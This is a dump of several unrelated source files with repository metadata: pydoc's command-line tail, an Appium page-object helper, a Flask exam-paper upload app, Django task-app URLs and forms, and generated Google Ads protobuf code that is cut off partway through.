return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if opt == '-c':
if val == "classic":
CSS_PATH = "pydoc_data/pydoc_orig.css"
else:
css_ = os.path.join(os.getcwd(), val)
if os.path.isfile(css_):
CSS_PATH = val
if start_server:
if port is None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
{cmd} -c <name>
Alternate choice for styling option. If name == classic, the color scheme
used mimics the original pydoc style. If a valid css file path is given
(relative to the server), it is used instead.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
[
"andre.roberge@gmail.com"
] |
andre.roberge@gmail.com
|
5ca221bad2a6b50e82b27345b2e7ece02878aba1
|
7d12d1a7d840414f3ae3cf03173b1e4722640ba1
|
/appium_jike/page/config_page.py
|
4982e3d843ec3704ae19defbb555f87cec1a4082
|
[] |
no_license
|
liuchengxu11/sunxing
|
e8927b4898c942eb03494aa49cb5bb66fd69dceb
|
cd2002abeebdc38d332246e1ea0e597896493a8b
|
refs/heads/master
| 2021-01-16T13:47:01.082002
| 2020-03-29T11:35:27
| 2020-03-29T11:35:27
| 243,142,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,893
|
py
|
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.webdriver import WebDriver
import time
class Config_page:
_black_list = [
(By.XPATH,
"/hierarchy/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.FrameLayout/android.widget.FrameLayout/android.widget.LinearLayout/android.widget.ImageView[2]"),
] # 这个就是写的在执行过程中出现的各种弹窗,广告
def __init__(self, driver:WebDriver):
self.driver = driver
def find_element(self, locator):
print(locator)
try:
return self.driver.find_element(*locator)
except BaseException:
self.handle_exception()
# self.find_element(locator)
return self.driver.find_element(*locator)
def find_element_and_click(self, locator):#有时候单纯的点击也会有异常封装一个点击的方法
print("click")
try:
#如果click也有异常,可以这样处理
self.find_element(locator).click()
except:
self.handle_exception()
self.find_element(locator).click()
def find_element_and_send(self, locator, sendkeys="", dian=None): # 封装一个输入的方法
print("sendkkeys={}".format(sendkeys))
if dian is not None:
try:
self.find_element(locator).click()
self.find_element(locator).clear()
self.find_element(locator).send_keys(sendkeys)
self.find_element(dian).click()
except BaseException:
self.handle_exception()
self.find_element(locator).click()
self.find_element(locator).clear()
self.find_element(locator).send_keys(sendkeys)
self.find_element(dian).click()
else:
try:
self.find_element(locator).click()
self.find_element(locator).clear()
self.find_element(locator).send_keys(sendkeys)
except BaseException:
self.handle_exception()
self.find_element(locator).click()
self.find_element(locator).clear()
self.find_element(locator).send_keys(sendkeys)
def handle_exception(self):
print(":exception")
self.driver.implicitly_wait(0) # 这里先设置隐式等待为0秒加快异常的处理速度然后在结束的时候设置回来
for locator in self._black_list:
print(locator)
elements = self.driver.find_elements(*locator)
if len(elements) >= 1:
# 通过循环看自己弹窗的元素id是否找到 找到后就点击
elements[0].click()
else:
print("%s not found" % str(locator))
self.driver.implicitly_wait(10)
|
[
"meiqianchifa@163.com"
] |
meiqianchifa@163.com
|
dee88f1bf71213b63a17310865bbb65489377dbf
|
55ecf7684f25a5932edab1a2c2533aa9c7a65fc0
|
/app/routes.py
|
e4deec4a01b36913addabfa4886748606d809167
|
[] |
no_license
|
linxumelon/examplifier
|
87184265b80a2b09edb162699a945b2750dcb19f
|
d266b145c97e76e610ee1bbe73e32081218fdf4e
|
refs/heads/main
| 2023-01-10T11:00:09.297474
| 2020-11-07T07:20:56
| 2020-11-07T07:20:56
| 308,389,916
| 0
| 0
| null | 2020-11-07T07:20:57
| 2020-10-29T16:40:57
|
Python
|
UTF-8
|
Python
| false
| false
| 6,518
|
py
|
import os
import sys
from flask_login import current_user, login_user, login_required, logout_user
from flask import render_template, flash, redirect, url_for, request, send_from_directory
from werkzeug.utils import secure_filename
from werkzeug.urls import url_parse
from app import app
from app import db
from app.forms import LoginForm, UploadTestFileForm, AddModuleForm, RegistrationForm, IDENTITY_CHOICES
from app.models import User, Module, Teaches, Takes, TestPaper, StudentSubmission
from sqlalchemy import and_, or_, not_
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg'}
BASEDIR = os.path.dirname(app.instance_path)
@app.route('/')
@app.route('/index')
def index():
if not current_user.is_authenticated:
return redirect(url_for('login'))
print("basedir = {}".format(BASEDIR))
return render_template("index.html", title='Home Page')
@app.route('/teaching_modules', methods=['GET'])
@login_required
def get_teaching_mods():
modules = Teaches.query.filter_by(instructor_id=current_user.id).all()
return render_template('teaching_modules.html', title='Teaching Modules', user=current_user, modules=modules)
@app.route('/query_test_papers', methods=['GET'])
@login_required
def query_test_papers():
modules = Teaches.query.filter_by(instructor_id=current_user.id).all()
return render_template('query_test_papers.html', title='Query Test Papers', user=current_user, modules=modules)
@app.route('/view_test_papers/<module>', methods=['GET'])
@login_required
def view_test_papers(module):
test_papers = TestPaper.query.filter_by(modcode=module).all()
return render_template('view_test_papers.html', title='View Test Papers', user=current_user, test_papers=test_papers, module=module)
@app.route('/download/<module>/<filename>')
@login_required
def download_test_paper(module, filename):
moddir = os.path.join(BASEDIR, module)
print(" moddir = {}".format(moddir))
print(" filename = {}".format(filename))
filename.replace("%20", " ")
return send_from_directory(moddir, filename, as_attachment=True)
@app.route('/upload_test_file', methods=['GET', 'POST'])
@login_required
def upload_test_file():
form = UploadTestFileForm()
print("heeelllooooo")
if form.validate_on_submit():
print("heyyyyyy!")
modcode = secure_filename(form.modcode.data)
if not IsCurrentUserTeachingMod(modcode):
return render_template("upload_test_file.html", title='Upload Test File', form=form)
testfile = form.testfile.data
filename = secure_filename(testfile.filename)
moddir = os.path.join(BASEDIR, modcode)
files_with_given_name = TestPaper.query.filter_by(modcode=modcode, name=filename).all()
if (len(files_with_given_name) > 0):
filename = filename + " ({})".format(len(files_with_given_name))
print("filename= {}".format(filename))
fileurl = os.path.join(moddir, filename)
file_record = TestPaper(modcode=modcode, name=filename)
db.session.add(file_record)
db.session.commit()
print("fileurl = {}".format(fileurl))
testfile.save(fileurl)
flash('File successfully uploaded')
return redirect(url_for('index'))
else:
print("its not valid")
return render_template("upload_test_file.html", title='Upload Test File', form=form)
@app.route('/add_module', methods=['GET', 'POST'])
@login_required
def create_module():
form = AddModuleForm()
if form.validate_on_submit():
modcode = secure_filename(form.modcode.data)
dir_path = os.path.join(BASEDIR, modcode)
try:
os.mkdir(dir_path)
except Exception as e:
print("Error when making module directory: \n{}".format(e))
module = Module.query.filter_by(code=modcode).first()
if module is None:
module = Module(code=modcode)
print("module = {}".format(module))
db.session.add(module)
db.session.commit()
teaches = Teaches.query.filter_by(modcode=modcode, instructor_id=current_user.id).first()
if teaches is None:
teaches = Teaches(instructor_id=current_user.id, instructor_name=current_user.username, modcode=modcode)
print("teaches = {}".format(teaches))
db.session.add(teaches)
db.session.commit()
else:
print("Teaches exists: {}".format(teaches))
return redirect(url_for('index'))
return render_template('add_module.html', title='Add Module', form=form)
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(username=form.username.data).first()
print("user has password hash: {}".format(user.password_hash))
if user is None or not user.check_password(form.password.data):
flash('Invalid username or password')
return redirect(url_for('login'))
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
if not next_page or url_parse(next_page).netloc != '':
next_page = url_for('index')
return redirect(next_page)
return render_template('login.html', title='Sign In', form=form)
@app.route('/logout', methods=['GET', 'POST'])
def logout():
logout_user()
return redirect(url_for('index'))
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('index'))
form = RegistrationForm()
if form.validate_on_submit():
user = User(id=form.id.data, username=form.username.data, email=form.email.data, identity=dict(IDENTITY_CHOICES).get(form.identity.data))
user.set_password(form.password.data)
print("User has identity {}".format(user.identity))
db.session.add(user)
db.session.commit()
flash('Congratulations, you are now a registered user!')
return redirect(url_for('login'))
return render_template('register.html', title='Register', form=form)
def IsCurrentUserTeachingMod(modcode):
teaches = Teaches.query.filter_by(modcode=modcode, instructor_id=current_user.id).first()
if not teaches:
flash("No teaching record for this module. \n Please add module first if you are teaching this module. ")
return False
return True
|
[
"pollylin0617@gmail.com"
] |
pollylin0617@gmail.com
|
b576010e7db6584318f67fabd54e234ca64dbfcb
|
90d78ab5fc6179bab30a2d4f1205535b11f3c335
|
/base/urls.py
|
a12a9357a0499497c25d439d9b3835f353c9c626
|
[
"MIT"
] |
permissive
|
Rpetrizzo-C/todo-challenge
|
9480bf84e66ae311d4050f86c62cc2925bad493e
|
0c34a07efc17f4f83979f5df236c74180b371d8d
|
refs/heads/main
| 2023-07-29T12:37:46.790407
| 2021-08-30T21:54:22
| 2021-08-30T21:54:22
| 401,495,843
| 0
| 0
|
MIT
| 2021-08-30T21:52:46
| 2021-08-30T21:52:45
| null |
UTF-8
|
Python
| false
| false
| 922
|
py
|
from django.urls import path
from .views import (TaskListView, TaskDetailView, TaskCreateView,
TaskUpdateView, TaskDeleteView, CustomLoginView,
RegisterPageView, TaskReorderView)
from django.contrib.auth.views import LogoutView
urlpatterns = [
path('login/', CustomLoginView.as_view(), name='login'),
path('logout/', LogoutView.as_view(next_page='login'), name='logout'),
path('register/', RegisterPageView.as_view(), name='register'),
path('', TaskListView.as_view(), name='tasks'),
path('task/<int:pk>/', TaskDetailView.as_view(), name='task'),
path('task-create/', TaskCreateView.as_view(), name='task-create'),
path('task-update/<int:pk>/', TaskUpdateView.as_view(), name='task-update'),
path('task-delete/<int:pk>/', TaskDeleteView.as_view(), name='task-delete'),
path('task-reorder/', TaskReorderView.as_view(), name='task-reorder'),
]
|
[
"petrizzo.rodrigoa@gmail.com"
] |
petrizzo.rodrigoa@gmail.com
|
3f0a25f51728148e9027713415fc9bee3d6c31ef
|
35fd70d03a17824660a03d29c822cfeb14bb765c
|
/accounts/forms.py
|
43af801defa994016215ea0e03a417361c016f90
|
[
"MIT"
] |
permissive
|
shawon922/django-blog
|
517bef3f0b16489808858ffa34dee4affecc4c36
|
323c1c48d1afbcfe9e70d20fc8db7fde4ef007bf
|
refs/heads/master
| 2023-07-23T03:19:04.138800
| 2017-07-22T07:23:46
| 2017-07-22T07:23:46
| 73,935,675
| 4
| 3
|
MIT
| 2023-07-17T06:04:59
| 2016-11-16T15:54:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,039
|
py
|
from django import forms
from django.contrib.auth import (
authenticate,
get_user_model,
login,
logout
)
User = get_user_model()
class UserLoginForm(forms.Form):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
def clean(self, *args, **kwargs):
username = self.cleaned_data.get('username')
password = self.cleaned_data.get('password')
if username and password:
user = authenticate(username=username, password=password)
if not user:
raise forms.ValidationError('This user does not exist.')
# if not user.check_password(password):
# raise forms.ValidationError('Password is incorrect.')
if not user.is_active:
raise forms.ValidationError('This user is no longer active.')
return super(UserLoginForm, self).clean(*args, **kwargs)
class UserRegisterForm(forms.ModelForm):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'form-control'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'form-control'}))
email = forms.EmailField(widget=forms.EmailInput(attrs={'class': 'form-control'}))
def clean(self, *args, **kwargs):
username = self.cleaned_data.get('username')
email = self.cleaned_data.get('email')
if username:
user = User.objects.filter(username=username)
if user.exists():
raise forms.ValidationError('The username is already exists.')
if email:
user = User.objects.filter(email=email)
if user.exists():
raise forms.ValidationError('The email is already exists.')
return super(UserRegisterForm, self).clean(*args, **kwargs)
class Meta:
model = User
fields = [
'username',
'password',
'email'
]
|
[
"shawon922@gmail.com"
] |
shawon922@gmail.com
|
4f0ef26fe165b0b46815ad51b62f6a0c0f470256
|
42c48f3178a48b4a2a0aded547770027bf976350
|
/google/ads/google_ads/v5/proto/services/remarketing_action_service_pb2.py
|
0495a4d9e848a5eed492faca8b8aa2397a32544c
|
[
"Apache-2.0"
] |
permissive
|
fiboknacky/google-ads-python
|
e989464a85f28baca1f28d133994c73759e8b4d6
|
a5b6cede64f4d9912ae6ad26927a54e40448c9fe
|
refs/heads/master
| 2021-08-07T20:18:48.618563
| 2020-12-11T09:21:29
| 2020-12-11T09:21:29
| 229,712,514
| 0
| 0
|
Apache-2.0
| 2019-12-23T08:44:49
| 2019-12-23T08:44:49
| null |
UTF-8
|
Python
| false
| true
| 20,741
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/services/remarketing_action_service.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.resources import remarketing_action_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
from google.api import client_pb2 as google_dot_api_dot_client__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.protobuf import field_mask_pb2 as google_dot_protobuf_dot_field__mask__pb2
from google.rpc import status_pb2 as google_dot_rpc_dot_status__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/services/remarketing_action_service.proto',
package='google.ads.googleads.v5.services',
syntax='proto3',
serialized_options=b'\n$com.google.ads.googleads.v5.servicesB\035RemarketingActionServiceProtoP\001ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\242\002\003GAA\252\002 Google.Ads.GoogleAds.V5.Services\312\002 Google\\Ads\\GoogleAds\\V5\\Services\352\002$Google::Ads::GoogleAds::V5::Services',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nGgoogle/ads/googleads_v5/proto/services/remarketing_action_service.proto\x12 google.ads.googleads.v5.services\x1a@google/ads/googleads_v5/proto/resources/remarketing_action.proto\x1a\x1cgoogle/api/annotations.proto\x1a\x17google/api/client.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a google/protobuf/field_mask.proto\x1a\x17google/rpc/status.proto\"h\n\x1bGetRemarketingActionRequest\x12I\n\rresource_name\x18\x01 \x01(\tB2\xe0\x41\x02\xfa\x41,\n*googleads.googleapis.com/RemarketingAction\"\xc2\x01\n\x1fMutateRemarketingActionsRequest\x12\x18\n\x0b\x63ustomer_id\x18\x01 \x01(\tB\x03\xe0\x41\x02\x12U\n\noperations\x18\x02 \x03(\x0b\x32<.google.ads.googleads.v5.services.RemarketingActionOperationB\x03\xe0\x41\x02\x12\x17\n\x0fpartial_failure\x18\x03 \x01(\x08\x12\x15\n\rvalidate_only\x18\x04 \x01(\x08\"\xea\x01\n\x1aRemarketingActionOperation\x12/\n\x0bupdate_mask\x18\x04 \x01(\x0b\x32\x1a.google.protobuf.FieldMask\x12\x46\n\x06\x63reate\x18\x01 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x12\x46\n\x06update\x18\x02 \x01(\x0b\x32\x34.google.ads.googleads.v5.resources.RemarketingActionH\x00\x42\x0b\n\toperation\"\xa7\x01\n MutateRemarketingActionsResponse\x12\x31\n\x15partial_failure_error\x18\x03 \x01(\x0b\x32\x12.google.rpc.Status\x12P\n\x07results\x18\x02 \x03(\x0b\x32?.google.ads.googleads.v5.services.MutateRemarketingActionResult\"6\n\x1dMutateRemarketingActionResult\x12\x15\n\rresource_name\x18\x01 \x01(\t2\x94\x04\n\x18RemarketingActionService\x12\xd9\x01\n\x14GetRemarketingAction\x12=.google.ads.googleads.v5.services.GetRemarketingActionRequest\x1a\x34.google.ads.googleads.v5.resources.RemarketingAction\"L\x82\xd3\xe4\x93\x02\x36\x12\x34/v5/{resource_name=customers/*/remarketingActions/*}\xda\x41\rresource_name\x12\xfe\x01\n\x18MutateRemarketingActions\x12\x41.google.ads.googleads.v5.services.MutateRemarketingActionsRequest\x1a\x42.google.ads.googleads.v5.services.MutateRemarketingActionsResponse\"[\x82\xd3\xe4\x93\x02<\"7/v5/customers/{customer_id=*}/remarketingActions:mutate:\x01*\xda\x41\x16\x63ustomer_id,operations\x1a\x1b\xca\x41\x18googleads.googleapis.comB\x84\x02\n$com.google.ads.googleads.v5.servicesB\x1dRemarketingActionServiceProtoP\x01ZHgoogle.golang.org/genproto/googleapis/ads/googleads/v5/services;services\xa2\x02\x03GAA\xaa\x02 Google.Ads.GoogleAds.V5.Services\xca\x02 Google\\Ads\\GoogleAds\\V5\\Services\xea\x02$Google::Ads::GoogleAds::V5::Servicesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,google_dot_api_dot_client__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_protobuf_dot_field__mask__pb2.DESCRIPTOR,google_dot_rpc_dot_status__pb2.DESCRIPTOR,])
_GETREMARKETINGACTIONREQUEST = _descriptor.Descriptor(
name='GetRemarketingActionRequest',
full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.GetRemarketingActionRequest.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002\372A,\n*googleads.googleapis.com/RemarketingAction', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=349,
serialized_end=453,
)
_MUTATEREMARKETINGACTIONSREQUEST = _descriptor.Descriptor(
name='MutateRemarketingActionsRequest',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='customer_id', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.customer_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operations', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.operations', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='partial_failure', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.partial_failure', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='validate_only', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsRequest.validate_only', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=456,
serialized_end=650,
)
_REMARKETINGACTIONOPERATION = _descriptor.Descriptor(
name='RemarketingActionOperation',
full_name='google.ads.googleads.v5.services.RemarketingActionOperation',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='update_mask', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update_mask', index=0,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='create', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.create', index=1,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='update', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.update', index=2,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='operation', full_name='google.ads.googleads.v5.services.RemarketingActionOperation.operation',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=653,
serialized_end=887,
)
_MUTATEREMARKETINGACTIONSRESPONSE = _descriptor.Descriptor(
name='MutateRemarketingActionsResponse',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='partial_failure_error', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.partial_failure_error', index=0,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='results', full_name='google.ads.googleads.v5.services.MutateRemarketingActionsResponse.results', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=890,
serialized_end=1057,
)
_MUTATEREMARKETINGACTIONRESULT = _descriptor.Descriptor(
name='MutateRemarketingActionResult',
full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.services.MutateRemarketingActionResult.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1059,
serialized_end=1113,
)
_MUTATEREMARKETINGACTIONSREQUEST.fields_by_name['operations'].message_type = _REMARKETINGACTIONOPERATION
_REMARKETINGACTIONOPERATION.fields_by_name['update_mask'].message_type = google_dot_protobuf_dot_field__mask__pb2._FIELDMASK
_REMARKETINGACTIONOPERATION.fields_by_name['create'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.fields_by_name['update'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_resources_dot_remarketing__action__pb2._REMARKETINGACTION
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['create'])
_REMARKETINGACTIONOPERATION.fields_by_name['create'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_REMARKETINGACTIONOPERATION.oneofs_by_name['operation'].fields.append(
_REMARKETINGACTIONOPERATION.fields_by_name['update'])
_REMARKETINGACTIONOPERATION.fields_by_name['update'].containing_oneof = _REMARKETINGACTIONOPERATION.oneofs_by_name['operation']
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['partial_failure_error'].message_type = google_dot_rpc_dot_status__pb2._STATUS
_MUTATEREMARKETINGACTIONSRESPONSE.fields_by_name['results'].message_type = _MUTATEREMARKETINGACTIONRESULT
DESCRIPTOR.message_types_by_name['GetRemarketingActionRequest'] = _GETREMARKETINGACTIONREQUEST
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsRequest'] = _MUTATEREMARKETINGACTIONSREQUEST
DESCRIPTOR.message_types_by_name['RemarketingActionOperation'] = _REMARKETINGACTIONOPERATION
DESCRIPTOR.message_types_by_name['MutateRemarketingActionsResponse'] = _MUTATEREMARKETINGACTIONSRESPONSE
DESCRIPTOR.message_types_by_name['MutateRemarketingActionResult'] = _MUTATEREMARKETINGACTIONRESULT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
GetRemarketingActionRequest = _reflection.GeneratedProtocolMessageType('GetRemarketingActionRequest', (_message.Message,), {
'DESCRIPTOR' : _GETREMARKETINGACTIONREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.GetRemarketingAction][go
ogle.ads.googleads.v5.services.RemarketingActionService.GetRemarketing
Action].
Attributes:
resource_name:
Required. The resource name of the remarketing action to
fetch.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.GetRemarketingActionRequest)
})
_sym_db.RegisterMessage(GetRemarketingActionRequest)
MutateRemarketingActionsRequest = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsRequest', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSREQUEST,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Request message for [RemarketingActionService.MutateRemarketingActions
][google.ads.googleads.v5.services.RemarketingActionService.MutateRema
rketingActions].
Attributes:
customer_id:
Required. The ID of the customer whose remarketing actions are
being modified.
operations:
Required. The list of operations to perform on individual
remarketing actions.
partial_failure:
If true, successful operations will be carried out and invalid
operations will return errors. If false, all operations will
be carried out in one transaction if and only if they are all
valid. Default is false.
validate_only:
If true, the request is validated but not executed. Only
errors are returned, not results.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsRequest)
})
_sym_db.RegisterMessage(MutateRemarketingActionsRequest)
RemarketingActionOperation = _reflection.GeneratedProtocolMessageType('RemarketingActionOperation', (_message.Message,), {
'DESCRIPTOR' : _REMARKETINGACTIONOPERATION,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """A single operation (create, update) on a remarketing action.
Attributes:
update_mask:
FieldMask that determines which resource fields are modified
in an update.
operation:
The mutate operation.
create:
Create operation: No resource name is expected for the new
remarketing action.
update:
Update operation: The remarketing action is expected to have a
valid resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.RemarketingActionOperation)
})
_sym_db.RegisterMessage(RemarketingActionOperation)
MutateRemarketingActionsResponse = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionsResponse', (_message.Message,), {
'DESCRIPTOR' : _MUTATEREMARKETINGACTIONSRESPONSE,
'__module__' : 'google.ads.googleads_v5.proto.services.remarketing_action_service_pb2'
,
'__doc__': """Response message for remarketing action mutate.
Attributes:
partial_failure_error:
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial\_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results:
All results for the mutate.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.services.MutateRemarketingActionsResponse)
})
_sym_db.RegisterMessage(MutateRemarketingActionsResponse)
MutateRemarketingActionResult = _reflection.GeneratedProtocolMessageType('MutateRemarketingActionResult', (_message.Message,), {
